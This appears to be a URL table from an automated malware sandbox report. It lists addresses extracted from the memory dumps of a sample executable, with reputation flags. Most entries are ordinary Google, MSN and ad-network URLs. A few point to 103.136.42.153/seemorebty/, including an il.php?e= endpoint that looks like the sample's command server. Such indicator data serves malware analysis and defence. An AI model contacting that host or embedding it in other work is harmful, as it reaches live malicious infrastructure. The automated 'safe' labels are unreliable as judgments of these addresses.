http://www.msn.com/	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.430815949.0000000004228000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.537498077.0000000004330000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.544273152.0000000004330000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.538472349.0000000004190000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.484514622.0000000004050000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.389260261.0000000004208000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.390245558.0000000004208000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.396915274.0000000004270000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.380935334.0000000005F28000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
http://103.136.42.153/seemorebty/	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.406492322.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.406780287.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000002.555393551.00000000004F9000.00000004.00000010.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.320018633.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.517348522.0000000003E90000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.470857208.0000000003E90000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000002.569854907.0000000000F00000.00000004.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.511073198.0000000003E90000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.467720820.0000000003E90000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.510209199.0000000003E90000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.336031175.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.515757312.0000000003E90000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BE6B7572D	d.3.dr	false		high
http://ctlw.fa	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.414234687.00000000033E4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804	d.3.dr	false		high
https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3	d.3.dr	false		high
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347021081.0000000005568000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349233494.0000000005569000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false	URL Reputation: safe	unknown
https://contextual.media.net/48/nrrV18753.js	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350953625.0000000005F09000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.google.com/chrome/static/images/fallback/icon-help.jpg	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.381382844.00000000060C8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.google.com/chrome/static/images/homepage/google-enterprise.png	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.google.com/chrome/static/images/homepage/google-dev.png	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
http://crl.pki.goog/gsr2/gsr2.crl0?	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351442378.00000000060B0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.534169378.0000000004350000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.344677569.0000000004640000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351258305.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.344525230.00000000045C8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351574992.00000000043C8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349448406.00000000045C9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351358120.0000000006061000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.376499389.0000000004648000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347640015.0000000004647000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349340871.0000000004649000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351338476.0000000006059000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.381221387.0000000006060000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351426457.0000000006091000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347603038.0000000004645000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351521194.0000000006090000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351295568.0000000006031000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.494535680.0000000003F71000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.476014082.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false	URL Reputation: safe	unknown
https://www.google.com/chrome/thank-you.h	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.444765684.0000000004168000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.539292331.0000000004297000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.507782111.0000000005120000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pki.goog/gsr2/GTSGIAG3.crt0)	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.534169378.0000000004350000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.344677569.0000000004640000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.344525230.00000000045C8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349448406.00000000045C9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347640015.0000000004647000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349340871.0000000004649000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347603038.0000000004645000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.494535680.0000000003F71000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.476014082.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false	URL Reputation: safe	unknown
https://www.google.com/	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.430815949.0000000004228000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.538472349.0000000004190000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.484514622.0000000004050000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.396915274.0000000004270000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.google.com/chrome/static/images/fallback/icon-fb.jpg	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.381382844.00000000060C8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.google.com/chrome/static/images/mac-ico.png	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351620176.00000000060C9000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
http://pki.goog/gsr2/GTS1O1.crt0#	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351129238.0000000004649000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351295568.0000000006031000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false	URL Reputation: safe	unknown
https://aefd.nelreports.net/api/report?cat=bingth	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.315858692.0000000004568000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351585111.00000000060B9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.381353579.00000000060B8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.381370084.00000000060C0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350706634.0000000005FC9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350977554.0000000005EE9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.448836793.000000000422F000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.448873470.000000000422F000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.404760225.0000000004108000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false	URL Reputation: safe	unknown
https://www.google.com/chrome/static/images/google-play-download.png	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351620176.00000000060C9000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.google.com/chrome/static/images/chrome_throbber_fast.gif	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.google.com/chrome/static/images/homepage/google-canary.png	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.google.com/chrome/static/images/favicons/favicon-16x16.png	d.3.dr	false		high
https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314775552.0000000004458000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350903113.0000000005F68000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.404281530.0000000004237000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.404320020.0000000004238000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.341605504.0000000005668000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.345656135.0000000005668000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.535092916.0000000004340000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314267282.00000000044E9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.342452690.00000000054E8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349191582.0000000005669000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.307906562.0000000004490000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.428971263.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.449104366.0000000004431000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.536721197.0000000004341000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.307960313.0000000004491000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.499822636.0000000004261000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.499632698.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.389516118.00000000041E1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.388648532.00000000041E0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.403791587.0000000004301000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.477148014.00000000040A0000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351585111.00000000060B9000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.google.com/chrome/static/images/homepage/laptop_desktop.png	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.google.com/chrome/static/js/main.v2.min.js	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351585111.00000000060B9000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_333%2Cw_311%2Cc_fill%2Cg_faces:aut	d.3.dr	false		high
http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tL	d.3.dr	false	URL Reputation: safe	unknown
https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.434552345.0000000004359000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.425861993.0000000004177000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.487037473.0000000004148000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.472697671.0000000003FB1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.392029102.00000000042EF000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.google.com/chrome/static/images/homepage/homepage_privacy.png	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.381382844.00000000060C8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
http://ctl.136.42.153/	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.290116695.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.290916429.0000000000A28000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	d.3.dr	false		high
https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0	d.3.dr	false		high
https://cvision.media.net/new/300x194/2/138/47/25/3b2da2d4-7a38-47c3-b162-f33e769f51f5.jpg?v=9	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350091090.0000000005568000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347021081.0000000005568000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
http://103.136.42.153/seemorebty/il.php?e=	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.408530805.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.406492322.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.406780287.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.409020260.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.467253250.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.446086302.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.472522947.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.469104643.0000000000A58000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://srtb.msn.com/auction?a=de-ch&b=623d43496a394c99b1336ff5cc139eb9&c=MSN&d=http%3A%2F%2Fwww.msn	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314775552.0000000004458000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350903113.0000000005F68000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.404281530.0000000004237000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.404320020.0000000004238000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.google.com/chrome/static/images/cursor-replay.cur	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351620176.00000000060C9000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.google.com/chrome/static/js/installer.min.js	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
http://crl.pki.goog/GTSGIAG3.crl0	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.534169378.0000000004350000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.344677569.0000000004640000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.344525230.00000000045C8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349448406.00000000045C9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347640015.0000000004647000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349340871.0000000004649000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347603038.0000000004645000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.494535680.0000000003F71000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.476014082.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false	URL Reputation: safe	unknown
https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
